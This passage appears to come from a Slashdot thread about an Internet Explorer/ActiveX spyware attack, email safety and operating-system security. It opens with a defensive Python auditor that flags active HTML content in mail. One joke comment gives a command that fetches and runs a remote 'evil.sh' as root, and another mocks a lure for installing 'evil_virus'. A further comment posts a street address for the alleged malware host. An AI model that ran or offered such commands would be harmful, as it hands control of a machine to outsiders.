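    ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe", "frame"}
    URL_ATTRS = {"src", "href", "codebase", "background", "data"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []   # list of (kind, detail) tuples
        self.text = []       # visible text, used only as a fallback
        self._skip = 0       # depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in self.ACTIVE_TAGS:
            self.findings.append(("active-tag", tag))
        if tag in ("script", "style"):
            self._skip += 1
        for name, value in attrs:
            value = (value or "").strip()
            low = value.lower()
            if name.startswith("on"):              # onload, onclick, ...
                self.findings.append(("event-handler", f"{tag}[{name}]"))
            elif name in self.URL_ATTRS:
                if low.startswith("javascript:"):
                    self.findings.append(("script-url", f"{tag}[{name}]"))
                # <a href> is only followed on a click, so it is not
                # counted as an automatic fetch.
                elif low.startswith(("http://", "https://")) and tag != "a":
                    self.findings.append(
                        ("remote-fetch", f"{tag}[{name}]={value}"))

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip and data.strip():
            self.text.append(data.strip())


def safe_view(raw):
    """Return the text to display plus an audit of the HTML part.
    The HTML is parsed for reporting only; it is never rendered."""
    msg = email.message_from_string(raw, policy=policy.default)
    plain_part = msg.get_body(preferencelist=("plain",))
    html_part = msg.get_body(preferencelist=("html",))
    auditor = ActiveContentAuditor()
    if html_part is not None:
        auditor.feed(html_part.get_content())
        auditor.close()
    if plain_part is not None:
        text = plain_part.get_content().strip()
    else:
        # HTML-only mail: fall back to the tag-stripped text.
        text = " ".join(auditor.text)
    return {"text": text, "findings": auditor.findings}


if __name__ == "__main__":
    result = safe_view(SAMPLE)
    print(result["text"])
    for kind, detail in result["findings"]:
        print(f"  blocked {kind}: {detail}")
```

Sender identity plays no part in the decision, so the same handling applies to mail from a whitelisted address.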
    16. Re:OR by Anonymous Coward · · Score: 0

      Yeah, if a friend gets a virus and you're in his email friend addresses, it will not take a long time to infect your machine... so the better solution is to get a good anti-virus which will detect the infected email before you open it.

      gauge
      sylvia

  61. NO, it's the INTERFACE. by tentimestwenty · · Score: 2, Insightful

    I agree the users are a big problem, but the technology is horrible too, not just in Windows but all OSes. The Mac is the only system that balances the user's need to accomplish things with the protection to not do something catastrophic. It doesn't do this through tons of "Are you sure..." dialog boxes, or with Orwellian security routines, and not even through add-on programs which check up on viruses and backups.

    The Mac simply has a user interface that allows you to do the things you want to do. It sounds simple, but most Mac users don't ever get to the point of confusion where they might do something stupid. The terminal isn't right there on the desktop, it's not even in the Applications folder. It's in a folder called Utilities. The Windows folder is such a generic name, it's a likely candidate to be "cleaned out" by a curious user. On the Mac it's called System which has an obvious connotation that it's important to running your computer. I could go on and on.

    The interface of the machine is the easiest way to educate users. Make it intuitive and even a novice is going to play safe.

  62. What's frustrating... by tkrotchko · · Score: 1

    Is that ActiveX components can't be installed; there's no list of what was installed, there's no uninstall... I know there's 3rd party tools to tell you what ActiveX controls were installed, but that's only half the battle.

    I've often suspected this kind of stuff is done to purposely hide stuff from users.

    Kind of like how the registry is designed to hide things. It's overly complex for what it does, and it's easy to hide things there. I think it's that way on purpose. So that 3rd party publishers can activate programs (or deactivate them), and you either don't know or can't do anything about it.

    Imagine if the registry was a plain old text file. You could back it up easily, and you'd be able to grep for changes easily. But that would defeat 1/2 its purpose, wouldn't it.

    What's that old slogan? You reap what you sow..

    --
    You were mistaken. Which is odd, since memory shouldn't be a problem for you
    1. Re:What's frustrating... by msoftsucks · · Score: 1

      Actually, this was done by M$ intentionally in order for them to be able to access your machine. Just take a look at the Media Player 9 EULA. This EULA basically states that M$ has the right to access your machine at any time they feel like it. Get access to any file they want, and if they don't like what they see (DRM) can remotely disable your machine. By upgrading to WMP 9, you have signed away your soul to the devil. This is what ActiveX is only good for.

      --
      Quit playing Monopoly with Bill.
      Linux - of the people, by the people, and for the people.
  63. Probably an autoproxy, not a virus by philg · · Score: 2, Insightful

    I was analyzing something very similar around October of last year when I worked here. They probably aren't installing a virus, per se -- more like an autoproxy which they will use to send spam or install more malware (e.g., to steal passwords or credit card numbers).

    All the vulnerabilities mentioned in the article have been known for quite some time. Liu Die Yu's Unpatched IE vulnerabilities page documents several of these in detail, with exploit examples. (Note that some of the links on Liu Die Yu's site may result in popups, ironically.)

    When I took a look at it, the proxy flavor of the month was most commonly referred to as ap216.exe (the filename is irrelevant, obviously). A good description of it is here, in the context of its use in a phishing scam.

    Note that everything done in this attack will blithely go through most firewalls -- almost all connections are initiated from within the network. Firewalls are an increasingly inadequate means of protecting users from organized and motivated attackers. IMO, any network admin who doesn't run deep-packet inspection firewalls, intrusion prevention, or security-minded filtering application proxies is asking for it.

    Sure, someone could write something to quietly delete all the files on your hard drive. I'm sure he'd rather have all the spam your machine can send, or all the money from your bank account.

    phil

    1. Re:Probably an autoproxy, not a virus by diablobynight · · Score: 1

      Yes of course, all the money from my bank account. Lord knows I keep my bank number, routing number, and pin number, in a text file on my computer marked Bank Information for hacker to use.txt
      Get real.
      and to you up there who puts his computer on a school network, without all patches and updates, of course you received a virus, that's kind of like me bitching if I walk around with my wallet exposed and my eyes closed in London, and then I bitch if my money gets stolen.
      A good virus detection program, a NAT router, a spam catcher behind your email server, and a quick look at the security settings, namely changing most of them to prompt before install, and you're pretty good to go. Granted, things still could happen to you, lots of them, but you could slip and fall in the shower. lol. My point being, taking away html from email(making them boring), and lots of other stuff you could do, will just make your computing time less enjoyable all the time as opposed to it being less enjoyable some of the time.

      --
      Anonymous Cowards - Oh God, How I hate you
    2. Re:Probably an autoproxy, not a virus by philg · · Score: 1

      "Yes of course, all the money from my bank account. Lord knows I keep my bank number, routing number, and pin number, in a text file on my computer marked Bank Information for hacker to use.txt Get real."

      Do you bank online? If you're infected with ap216, someone can remotely install keystroke loggers and other nasties on your computer. Believe it or not, they're not doing this just for fun.

      'Course, you seem to take reasonable precautions, so you (probably) wouldn't get infected with ap216. Unless you visited one of the hacked websites mentioned in the lurhq.com article I linked to using an unpatched copy of IE 6. (They weren't just 'HOT BRITNEY PORN!!1' -- one of the infected sites was a small business selling uniforms and supplies to school and organizational sports teams, for instance. It took credit card orders -- no word on whether the hacked version stored the numbers in a file involved named "Bank Information for hacker to use.txt".)

      That said, they were probably mostly after machines to send spam from/through, and (with the exception of updating your browser) your precautions list is pretty complete for a user. (It's also a bit of a hassle -- we can only hope MS will figure out that some of their software is easy to use, but hard to use responsibly.)

      phil
  64. patching by Metaldsa · · Score: 3, Insightful

    Isn't it funny how we have people complaining how windows auto-update can download patches automatically into users machines and how this is dangerous but at the same time we blame these windows users for not updating their pcs. So when you have tens of millions of windows pcs would you rather MS update them automatically or not? This is probably a dumb question because I bet the /. crowd is divided on it as a matter of privacy and annoyance.

    1. Re:patching by Anonymous Coward · · Score: 0

      Laziness breeds automation. Automation breeds laziness. It's this vicious cycle that /.'ers are annoyed at. /Raging against the Machine

    2. Re:patching by freeweed · · Score: 1

      Yeah, it's almost as if Slashdot is composed of individuals, who have differing opinions on things.

      Funny, eh?

      --
      Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
    3. Re:patching by zero_offset · · Score: 1

      Almost, but not quite...

      --

      Slashdot quality declines as the number of hot grits posts decreases. - Provolt's Law, Apr-09-2005

  65. Bad example: McAfee's broken by design. by gfecyk · · Score: 1

    I once posted here how McAfee's software broke my Win2K installation by messing up a bunch of file types and prompting "Preparing to Install..." every time I tried launching IE. Haven't touched or recommended McAfee's software ever since.

    While Norton AV works as a regular user, it obviously can't get to stuff restricted from the regular user.

    Aside from that I admit I can't tell you how Norton behaves as a regular user, because clients those networks I've locked down actually don't need AV software on the desktop! A Snapgear firewall catches worms before the fact, Outlook 2K catches executable attachments before the fact, and denying Execute permissions in %temp% and Documents and Settings stops viruses in zip files before the fact. And even if something gets past all that, what harm can the virus do running as a regular user? Take up CPU time until the user logs off?

    Heh, the virus would probably crash to Dr Watson because it wasn't designed to run as a regular user. heh heh heh heh

    --
    Use Evolution instead of Outlook? Bewa
  66. "Run as" by autechre · · Score: 2, Informative

    Windows 2000 and up have "run as" functionality, which allows you to run binaries as another user (normally Administrator). Just right-click on it.

    I have everyone running as "Power Users" on Win2k desktops, and I'm considering trying to get that down to the lower setting where nothing can be installed.

    --
    WMBC freeform/independent online radio.
    1. Re:"Run as" by 0123456 · · Score: 1

      Cool... I'd never seen that before. Thanks.

    2. Re:"Run as" by whathappenedtomonday · · Score: 1

      won't work with xp home / w2k non-pro AFAIK

      --
      I hope I didn't brain my damage.
    3. Re:"Run as" by ameoba · · Score: 2, Informative

      isn't shift-right-click?

      --
      my sig's at the bottom of the page.
    4. Re:"Run as" by autechre · · Score: 1

      Not here; a standard right-click offers the option.

      I meant to note before that this is not quite as useful as "su", since it's a bit limited. I don't think you can open up "special" things with "run as", such as control panel items (and unlike some Linux distributions and OS X, it will simply slap you down if you have insufficient privileges, rather than prompting for the Administrator password). But it's helpful for installing things like Flash plugins without logging out.

      --
      WMBC freeform/independent online radio.
  67. Monitoring...reputable...contradiction by Pac · · Score: 2, Interesting

    The phrase "a reputable Russian monitoring site" only makes sense if you think monitoring is a reputable business. I don't consider doubleclick reputable. I don't think anything in, near or around the advertising industry can be reputable. But that's just me, move on, nothing to see here.

  68. Check out Qwik-Fix. by autechre · · Score: 4, Informative

    Remember Pivx Labs, the folks that used to host the "21 unpatched vulnerabilities in IE" page and has since switched to being a slight MS apologist? They've got a nice product which is (currently) free. What they basically did was to tighten down Windows via things from standard settings to registry tweaks to a degree which most users won't notice. Several of the recently discovered IE vulnerabilities wouldn't have worked, and Blaster wouldn't have worked either under these settings.

    After trying it on my workstation for a couple of weeks, I've started deploying it to others. It seems to interfere with Norton Antivirus, though not McAfee (which is what UMBC machines should be using anyway).

    I also send out the desktops with Mozilla, Media Player Classic, RealAlternative, etc. If people want IM, I try to recommend GAIM. Open source apps tend to have been "written in a more paranoid age" as another poster put it, and also can't as easily get away with doing dumb crap. I also remove the IE and Outlook shortcuts from the desktop (but leave the IE shortcut in the start menu, because the eternally pending PeopleSoft requires it).

    --
    WMBC freeform/independent online radio.
  69. Spy.htm: honey pot potential by Ktistec+Machine · · Score: 4, Interesting

    Here's a honeypot idea: use the "spy.htm" code to add a machine to the attacker's "spy" log, then wait....

    1. Re:Spy.htm: honey pot potential by ONOIML8 · · Score: 1

      Oh, I love stuff like this. Elaborate!

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
  70. Yes , indeed! by Viol8 · · Score: 2, Funny

    As a linux user I have to be very careful when I upload windows .exe files just in case they do something nasty like , umm ... use up diskspace
    on my drive? Oh , but perhaps the spammer will get me to run a linux binary and I wouldn't have a clue what was going on as I saved the binary to my disk
    , opened an xterm , typed in its name and ran it? Yes , he'll have me fooled no doubt about that!

    1. Re:Yes , indeed! by ONOIML8 · · Score: 2, Insightful

      If you've never heard of a Linux or Unix program or script being compromised, you lead a sheltered life. So you review the source from start to finish before you compile and only run binaries from a trusted source...which of course could never be compromised. Great.

      And I know that it's impossible to find any flaws in Linux based software that could be taken advantage of by someone of ill intent. But I'm not sure that the malicious coders recognize that as truth.

      But as the user base grows there are more and more users who aren't as cautious as you. And, as the user base grows, there will be more of those sick fscks looking to cause you harm.

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
    2. Re:Yes , indeed! by Viol8 · · Score: 2, Insightful

      Sorry, I'm a bit confused. Please tell me how a mail program that only deals with plain text can be compromised? When you've done that then tell
      me how a binary will get run without me knowing it via email. And after that explain why I would be dumb enough to run ANY executable from an unknown source
      that had not been suitably verified first and even then why exactly would I run them as root user so they could do some serious harm without testing it in a chroot jail first?

    3. Re:Yes , indeed! by ONOIML8 · · Score: 3, Insightful

      First, you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard.

      I am not an expert in these things, so I won't bother to try to figure out how they can be done. I do know that much is possible. As an example, when I first left the BBS's and got on the internet I received an email warning me about an email going around that would wipe your hard drive clean if you opened it. I passed it on to my step-father, an engineer for the Navy working on a NASA base. He passed around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible. Do you agree with them today? 100 years ago most experts would have told you that landing on the moon was not possible. Nor was breaking the sound barrier. Please don't limit your imagination. I can assure you that the sick fscks out there aren't so limited.

      Look beyond things transmitted by email. Every day people find flaws in your favorite operating systems including ways to gain root access and do as they please. And every day someone is fixing that kind of problem. Every day we learn something new which often requires us to change software and change the way we run it to improve security.

      You sound very confident that you are secure, that it can't happen to you. I think you have a false sense of security. If you and your system were perfect, totally secure and immune to tampering by someone from the outside....well, you would have solved the problem for everyone. You'll be in high demand.

      Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
    4. Re:Yes , indeed! by Spoing · · Score: 1
      1. First, you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard.

      While that is true of the person you have responded to, the number of steps required (not optional) in a *nix environment to do the wrong thing is quite long. It requires experience to do the wrong thing. An average user would not be able to do these things, so they are safe where using Windows and a bad mail client like Outlook exposes them to danger easily and in some cases unavoidably.

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    5. Re:Yes , indeed! by Anonymous Coward · · Score: 0

      > Please tell me how a mail program that only deals with plain text can be compromised

      Google for "Pine Exploit", and you find numerous ways this can happen.

    6. Re:Yes , indeed! by Anonymous Coward · · Score: 0

      you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard

      Exactly- the problem's not the program(s) or the OS(s), it's the fucking STUPID ASS users!!!

    7. Re:Yes , indeed! by skyhawker · · Score: 1
      He passed around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible.
      At the time, their analysis was probably valid, because email clients could not run executable code. Being able to do so is a relatively recent invention. Furthermore, Microsoft has exacerbated the problem with their ActiveX technology -- something that is not found in any other browser on any other operating system. And the example exploit shows some sort of script that writes to the filesystem, something that most, if not all, other browsers don't allow. So yes, Microsoft is a major part of the problem, and most users of alternative operating systems don't really have to worry about this kind of problem.
      --

      The best diplomat I know is a fully activated phaser bank.
      -- Scotty.
    8. Re:Yes , indeed! by Viol8 · · Score: 1

      Fair enough , a buffer overflow bug can occur in any program. But that's a bug , it's not exploiting a *designed in feature* of the client.

    9. Re:Yes , indeed! by Reziac · · Score: 1
      Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?

      More to the point, do you know enough about programming to *identify* any malicious or vulnerable routines in that source code? And even if you're that good, are you sure you didn't miss one??

      --
      ~REZ~ #43301. Who'd fake being me anyway?
    10. Re:Yes , indeed! by Anonymous Coward · · Score: 0
      So you review the source from start to finish before you compile and only run binaries from a trusted source...which of course could never be compromised. Great.

      I write all of my software myself, you insensitive clod!

    11. Re:Yes , indeed! by ONOIML8 · · Score: 1

      It wasn't long after the "experts" said not to worry that the first major Outlook exploit happened. Maybe a month.

      You're right about ActiveX, I don't argue that. And yes, Microsoft and their closed source with slow repairs is a big part of the problem. A bigger part of the problem is the dominance of Windows, it's easy to write one little thing that will screw a vast majority of users.

      But to say that most users of other OS don't have to worry about that kind of problem, well I still think that's a pretty sheltered view. Maybe it would be better put to say they don't have to worry about it as much....for now.

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
  71. Anyone in West London? by cobyrne · · Score: 1, Informative
    According to the UK NIC, adversting.co.uk (the people who host a.exe) are at 13 The Glen, Southall, UB2 5RS.

    If you are in the area, and have sufficient curiosity, you can use this map to guide you to the location mentioned above.

    DISCLAIMER: it is possible that the UK NIC has the wrong information. It is possible that adversting.co.uk have nothing to do with a.exe (their web server may have been compromised).

    1. Re:Anyone in West London? by first.last · · Score: 0

      DISCLAIMER: it is possible that the UK NIC has the wrong information. It is possible that adversting.co.uk have nothing to do with a.exe (their web server may have been compromised).

      Fuck it, just tell GW they have WMD

      --
      Wishing I was a millionaire since 1969.
  72. Hey, it had a EULA... by MadAnthony02 · · Score: 2, Insightful

    the buddylinks spyware that the OP refers to actually pops up a box, complete with a link to a EULA, to accept or stop the install.

    The text of the EULA lists all the stuff that it does - send ads out to other people on your buddy list with no action on your part. And yet people agreed to it. And in general, shrink wrap/click wrap licenses have been held as legal.

    The problem is once again human nature - people are used to clicking yes on those boxes because they were originally for stuff you actually needed to view a webpage (Windows Update, shockwave and flash plugins, etc). People don't bother reading them, just click yes, and wind up installing toolbars, gator, weatherbug, bonzibuddy, and the rest of that crap.

  73. Only in the last 5 years??? by Viol8 · · Score: 1

    I'm sorry , what planet are you on? Security has been a major issue to some of us for over a decade AT LEAST! Just because MS suddenly pricked
    up its cloth ears only 5 years ago didn't mean other companies or institutions didn't give a damn. You think DEC was extolling the virtues of security in VMS back
    in the 80s just for a laugh?? God I wish some of the people on here would realise that every issue in the computing industry didn't arrive when they
    personally became aware of it.

    1. Re:Only in the last 5 years??? by jfengel · · Score: 1

      I should clarify: I was referring to personal computers, which weren't commonly networked at all until 10 years ago. People just wanted software that worked, for the most part, and it was rarely brought to their attention that networking made them extremely vulnerable.

      I personally am well aware of security; I wrote my thesis on multilevel compartmentalization back in the 80s. VMS was often applied to systems that did have to worry about security: banks, online transaction processing, etc.

      Personal computers, for home and office, rarely received that kind of attention. Even today, most software is rarely written with security in mind. Deliberately networked programs, like operating systems, mailers, and browsers receive the most attention.

      But you hear about exploits in music players every so often. I'm sure that with enough effort one could create, say, a Photoshop file that hijacked it. Non-networked applications still don't receive the attention they deserve, from MS or any other vendor, except under those circumstances that absolutely require it.

      So no, this didn't appear mysteriously five years ago, but Microsoft wasn't the only one to "prick up its ears" around then. The Macintosh didn't even have memory isolation until three years ago, and today the majority of programmers still code less defensively than they should, because real security takes a hell of a lot of effort.

  74. More exactly... by abb3w · · Score: 2, Informative

    The "Administrators", "Users", and "Power Users" groups all exist on WinXP home&pro. Of course, you need to know to go into the MMC computer management snap in and change the users' groups manually.

    --
    //Information does not want to be free; it wants to breed.
  75. Yes by bagofbeans · · Score: 2, Informative

    Ecards, party organise sites also.

    I also nicely ask people who send me 'interesting' stuff (jokes/politics/whatever) and cc people I don't know not to do it again. The second offense, I am ruder. I have had no spam ever on my 3 yr old yahoo address...

  76. Re:It'd be scary if I ran my PC as Administrator.. by cyt0plas · · Score: 3, Funny

    You have received an E-Card. If you're using Outlook[express], you are already infected.

    For unix/linux users, run "exec -o lynx --dump http://oursite.com/evil.sh". This command should be ran as root. You may need to compile lynx from source.

    --
    Contact Me (got tired of viruses emailing me).
  77. I'm quite sure... by Kjella · · Score: 5, Insightful

    I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin privileges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

    But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.


    ...that Microsoft really would like to change it. They're not exactly too happy about their reputation for spam etc. The real issue is that consumers don't want security - oh they say they do but they don't. They just want to have their cake and eat it too.

    Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.

    It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.

    They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.

    But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.

    So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.

    Kjella

    --
    Live today, because you never know what tomorrow brings
    1. Re:I'm quite sure... by misleb · · Score: 1
      It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI.

      It is as if computer users are Girlfriends From Hell(tm). If I was a computer, I would have broken up with users a long time ago... particularly if I had mind-bogglingly good AI.

      -matthew

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
    2. Re:I'm quite sure... by The+Bullroarer · · Score: 1
      What would be really interesting is an aptitude test built in to the software. If users want to enable "power user" features, they would first have to pass the computerized aptitude test. Users who fail would have to wait a set period (like a month, a year, a century :-> ) before trying again.

      Hey, how about this? The "enable advanced features" button pretends to enable power user features, but only fabricates different scenarios to test the user's response to them? For example, for a month after clicking this button, a luser would see e-mails in his inbox which are manufactured by the software to see whether he's dumb^H^H^H^Htrusting enough to click on an e-mail like "I need you help to access my money" or "Incease your {p*n*s|br**st|p*cs} size now!!!" Satisfactory performance over a sufficient period of time would enable actual use of advanced features.

      If that idea is too impractical, what about just linking advanced features to the presence of quality AntiVirus software? Whenever I'm called in to work on a client's computer, I check their antivirus protection and strongly recommend Norton if it isn't already installed. (I am multiOStral, consulting for Macs and PCs, and learning Linux.) You could have the button saying "Enable Power Features" check for the presence of updated AV software. If same is not present, the box would say:

      You have requested a feature which requires the presence of anti-virus software. Please install such software before attempting to use this feature. Consult your local X vendor for appropriate titles.

      Does anyone know how much damage a naive luser could actually do with AV software installed?

      --
      Frodo Lives!!
  78. Re:e-cards by LighthouseJ · · Score: 1

    I was going to moderate this message, but I wanted to respond.

    At greeting card stores, they have blank greeting cards. For instance, if it's a happy birthday card, on the front might be an 8 year old girl blowing out birthday candles and nothing else is on the front or inside of the card. Just get that and copy the greeting from the e-card site, it shows the receiver that you're giving personal attention to them with an "original" greeting, as opposed to a pre-printed greeting.

    Email invitations, greeting cards and such are so tactless anyway. You and your wife can expel the $.99, if that, to get a nice card, or like I said above, make your own. Trust me, your friends you send cards to will appreciate the effort.

  79. Obvious, but too good to miss... by Anonymous Coward · · Score: 2, Funny
    "To view this e-card, please move the attachment to your home directory, then open a konsole window and enter these commands:
    cd ~
    tar xzf evil_virus.tar.gz
    cd evil_virus
    ./configure
    make
    su root (enter your root password when prompted)
    make install
    /usr/local/bin/evil_virus
    Congratulations! Your greetings card will now be displayed!"
    1. Re:Obvious, but too good to miss... by eugene+ts+wong · · Score: 1

      That looks too hard. Do you have a way to do it without typing?

  80. ways to fool even skilled computer users? by Jay9333 · · Score: 1
    The author said as his conclusion, "Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users."

    I'm not so sure this hijacker found a way to fool "even experienced and skilled computer users". Anybody with even a very basic know-how of how to safely use a web browser knows that you shouldn't even go to websites if you don't know and trust the person or organization directing you to that website (especially if you're running IE!).

  81. Someone get this on dslreports.com please by Anonymous Coward · · Score: 0

    The author fingers the hosting company for the spammer located in the US.

    Can someone with a dslreports.com account get this listed as a news item?

    Thanks.

  82. Userland Trojans by nurb432 · · Score: 1

    They can still have a huge effect on things, remember your address book is available as a 'user'.

    So is the ability to spam out via smtp.... Or turned into DDOS node...

    True, it's harder to trash the system, but as far as causing issues for all your friends, you don't need much in the way of rights....

    This applies to whatever OS you use really....

    --
    ---- Booth was a patriot ----
  83. I'll bet... by first.last · · Score: 0

    this guy would go to the PIs and contract clap, just to see what its like...

    --
    Wishing I was a millionaire since 1969.
  84. MacOSX Mail by Espectr0 · · Score: 1

    Anyone knows how to disable html completely in Mail?

    Going to preferences, viewing, and unchecking the "display images and embedded objects" doesn't work properly.

    I find Mail very incomplete, but it has a plugin for easy viewing hotmail mail. Anyone know something similar for thunderbird?

  85. Re:e-cards by gnu-generation-one · · Score: 2, Informative

    "What really annoys me about e-cards is that even the legitimate ones look like spam"

    Send people a tutorial on how to _attach_ the cute picture to the email, and write the text themselves?

    Saves us all time...

  86. Re:Frightening - "Not just your PC" by NotQuiteReal · · Score: 1
    I would never even entertain the idea of putting some dubious product, purchased via SPAM advertising on my delicate dangly parts!

    If you did get some growth, you'd be lucky if it were benign. One-eyed trouser trout - ha! Think three-eyed fish from the Simpsons!

    --
    This issue is a bit more complicated than you think.
  87. Keep HTML ditch activex by gad_zuki! · · Score: 4, Informative

    The only real "exploit" here is the activeX installer. Most email clients render plain-text URLs clickable anyway.

    There's a reason why this stuff is written with activex controls - they look official like they're from the operating system. Disable activex and watch the spyware go away. It seems most people know not to download an .exe but think activeX, especially when it's "signed," means that it's safe.

  88. Icon + Pilgrimage == TOURISM by rdmiller3 · · Score: 0, Offtopic
    Anyone else catch the phrases, "historic icon" and "scientific pilgrimage" in one quote from the leading 'discoverer'?

    I wonder how many ships of the same class as the HMS Beagle were made, and how much it'll cost the locals to get it endorsed as 'authentic'?

    And isn't it amazing how these fans of evolutionary theory are almost religious about it all?

    Evolutionism is a religion when they say that they know how something evolved. Creationism is a science when they find a fossilized hat and disprove the accuracy of commonly accepted dating methods.

    1. Re:Icon + Pilgrimage == TOURISM by not-my-real-name · · Score: 0

      Well it's obvious to me that spam has evolved from its early days of usenet green cards. Methods of fighting spam have also evolved.

      --
      un-ALTERED reproduction and dissimination of this IMPORTANT information is ENCOURAGED
    2. Re:Icon + Pilgrimage == TOURISM by rdmiller3 · · Score: 1

      I'm pretty sure I replied to the Beagle Found article... I don't know how this got stuck under the adjacent one.

  89. Re:I am a windows user by gwayne · · Score: 1

    I don't know much about windows except the fact that...everything is already done by someone else.

    Therein lies the problem. One can relatively secure a Linux box in half an hour:

    1. Disable unnecessary services.
    2. Configure iptables.
    3. Update to latest versions.
    4. Run through CERT security checklist

    Try disabling IIS on Windows Server and see what else breaks.

  90. Re:It'd be scary if I ran my PC as Administrator.. by ONOIML8 · · Score: 1

    You think you have to do all that to compromise your system?

    Better think again.

    --
    . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
  91. Nice Spin, MS by Anonymous Coward · · Score: 5, Funny
    This article describes a new feature that is added to Outlook 2002 in Microsoft Office XP Service Pack 1 (SP-1)... Click Start, and then click Run. In the Open box, type regedit...

    Was the (Cough) "new feature" originally only intended for internal use (where they know how really risky using their own products can be), or is Regedit going to replace menus in future versions of Windows?

  92. Doesn't work here... by Anonymous Coward · · Score: 1, Informative

    Out of curiosity, I tried to make my own version of the exploit. I didn't overwrite WMP, but I had it write a file to disk.

    On Win2k/IE6, I get two warning dialogs.

    On my coworker's XP machine, it just plain doesn't work.

    Maybe if we had done stuff with HTML mail instead of inside IE it would have worked...

  93. Are Unix systems secure? by cpghost · · Score: 2, Interesting

    As Unix(*) users, we feel pretty confident when confronted with this kind of a.exe crap. But seriously, what would have happened, if the file was a Linux executable? A shell or perl script? Are we still secure? Maybe, maybe not:

    • It depends what browser we're using. Browsers on Unix normally don't execute remote code, but the more browsers we use, the less we can be sure.
    • Are our rendering engines (Gecko and Konqueror) really immune to buffer overruns of malicious web sites? We don't know for sure. Most of us are aware of Konqueror dumping core, but no harm is done, because a Windows virus couldn't start. What if the remote site contained valid Linux instructions instead?
    • A whole class of vulnerabilities consists of so called cross site scripting vulns (see bugtraq).
    • Even if an executable runs with the permissions of a regular, non-root user, are we still secure? I've seen setups where the user was a member of group 0 (wheel), which opened up a whole lot of potential vulnerabilities.

    The biggest asset of the Unix community is still the high level computer literacy amongst its users. We're smarter than regular Windows users on the average, and we know better than to blindly click on links when we're being told to. But with growing Linux popularity, we're bound to "inherit" more unsavvy and clueless computer users, which would be just as malleable as Windows users.

    The last line of defense(tm) consists of just two principles:

    • We don't run our browsers in kernel mode.
    • We don't use the root account for regular activities (right?).

    Will that be enough, once spammers start targeting Linux? Let's hope for the best.

    (*) Unix in the generic sense, not Darl's.

    --
    cpghost at Cordula's Web.
    1. Re:Are Unix systems secure? by cavac · · Score: 1

      There's another line of defence, at least for Unix-Geeks (but not your "My browser is a Compaq"-User): Unix-Geeks tend to use non-Intel Hardware more frequently, so just inserting Assembler-Code into a running program will not work for at least one of two reasons:

      1) The stack is not compatible
      2) The CPU just shrugs at the code and kills your program

      Shell-Scripts would be not that easy, because they would be quite complicated to run on enough shells with a huge mess of incompatible commands and command-line tools.

      As for Perl: You can either include all needed modules into your script (which is quite hard because some of them need compiling to your EXACT target configuration) or your script might use your victim's CPAN-module (which might not even be configured correctly) and tie up the user's computer for hours while the virus/worm is *trying* to install required modules.

      In my opinion, the main reason that there are very few Unix and Linux virii and worms is that binary programs most likely would have to use the autoconf/automake framework (or something similar) and the target's package management tools to sort out the target's mess before being able to do some nasty stuff. Same problem with scripts.

      For example: On a barebone NetBSD fileserver, a script worm might have to install pkgsrc (the package management), perl and Mail::SMTP or alternatively configure sendmail, allow it in rc.conf and start it before being able to act as a mail-relay. A BINARY worm with its own SMTP-engine would be quite useless, because it would not only have to match the target platform, but the System version as well, because network libraries AND threading change constantly these days...

      Writing a worm/virus for Unix/Linux might be most promising when you got a very specific target host. But to say writing a general one for a variety of platforms and distributions would be a nightmare is a very optimistic view at best.

      LLAP & LG
      Rene

      --
      Look, this thing is totally safe! Built it myself, you know. You just press that button like this and then turn that lev
    2. Re:Are Unix systems secure? by cpghost · · Score: 1

      A perl script doesn't really need any CPAN modules at all to be effective. Just take SMTP as an example: this is an extremely simple protocol that you can simulate in a few lines of perl (at least enough of it to send gazillions of spams!). You don't really need Net::SMTP or some such.

      An executable ELF binary doesn't need autoconf, automake etc. to run. That already happened at compile time. Again, a carefully written C program could use only glibc, and nothing more. No need to use external (networking? protocol?...) libs or other dependencies, which may not be present on the target machine.

